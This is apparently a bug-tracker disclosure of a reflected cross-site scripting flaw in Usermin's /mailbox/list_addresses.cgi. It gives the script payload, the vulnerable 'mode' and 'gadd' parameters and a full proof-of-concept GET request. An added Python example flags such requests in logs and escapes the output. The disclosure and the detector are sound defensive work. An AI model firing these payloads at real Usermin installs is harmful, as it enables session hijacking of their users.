
#478 XSS (cross-site scripting) vulnerability in /mailbox/list_addresses.cgi

1.780
open
nobody
None
5
2019-10-21
2019-10-21
xyz
No

Affects Usermin versions up to 1.780.

Testing done by setting all user input parameters to: >"'><script>alert(1)</script>

The following parameters were found vulnerable:
Set parameter 'mode's value to '%3E%22%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E'
Set parameter 'gadd's value to '%3E%22%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E'

This allowed a script to be successfully embedded in the response, which then executed when the page loaded in the user's browser.

Sample Proof-of-Concept:

GET /mailbox/list_addresses.cgi?mode=%3E%22%27%3E%3Cscript%3Ealert%28847%29%3C%2Fscript%3E&gadd=%3E%22%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Referer: https://10.0.0.5:20000/mailbox/list_addresses.cgi
Cookie: usid=f610dae7a3720a29d43a7493da7147f8; testing=1; redirect=1
Connection: Keep-Alive
Host: 10.0.0.5:20000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US

Usermin was installed on Ubuntu 18.04.

1 Attachments
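
Added example, not part of the original report and not Usermin code: a log check that flags requests to the reported endpoint whose 'mode' or 'gadd' value decodes to HTML metacharacters, together with the output encoding that makes the reported payload inert. The function names and the two benign sample lines are constructed for illustration.

```python
import html
import re
from urllib.parse import urlsplit, parse_qsl

# Endpoint and parameter names are taken from the report above.
ENDPOINT = "/mailbox/list_addresses.cgi"
REPORTED_PARAMS = {"mode", "gadd"}
# Characters that let a reflected value leave an HTML attribute or text node.
HTML_META = re.compile(r"[<>\"']")


def flag_request(request_line):
    """Return the reported parameters whose decoded value contains HTML
    metacharacters, for one 'METHOD target HTTP/x.y' request line."""
    parts = request_line.split()
    if len(parts) < 2:
        return []
    target = urlsplit(parts[1])
    if target.path != ENDPOINT:
        return []
    flagged = []
    # parse_qsl percent-decodes values, so %3Cscript%3E is seen as <script>.
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        if name in REPORTED_PARAMS and HTML_META.search(value):
            flagged.append(name)
    return sorted(set(flagged))


def encode_for_html(value):
    """Output encoding to apply before echoing a parameter into HTML:
    escapes & < > and both quote characters."""
    return html.escape(value, quote=True)


# Sample request lines: the first is the one from the report, the other
# two are constructed (benign values, and a different endpoint).
SAMPLE_LINES = [
    "GET /mailbox/list_addresses.cgi?mode=%3E%22%27%3E%3Cscript%3Ealert%28847%29"
    "%3C%2Fscript%3E&gadd=%3E%22%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E HTTP/1.1",
    "GET /mailbox/list_addresses.cgi?mode=users&gadd=1 HTTP/1.1",
    "GET /mailbox/index.cgi?mode=%3Cb%3E HTTP/1.1",
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        print(flag_request(line), line[:60])
    print(encode_for_html(">\"'><script>alert(1)</script>"))
```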
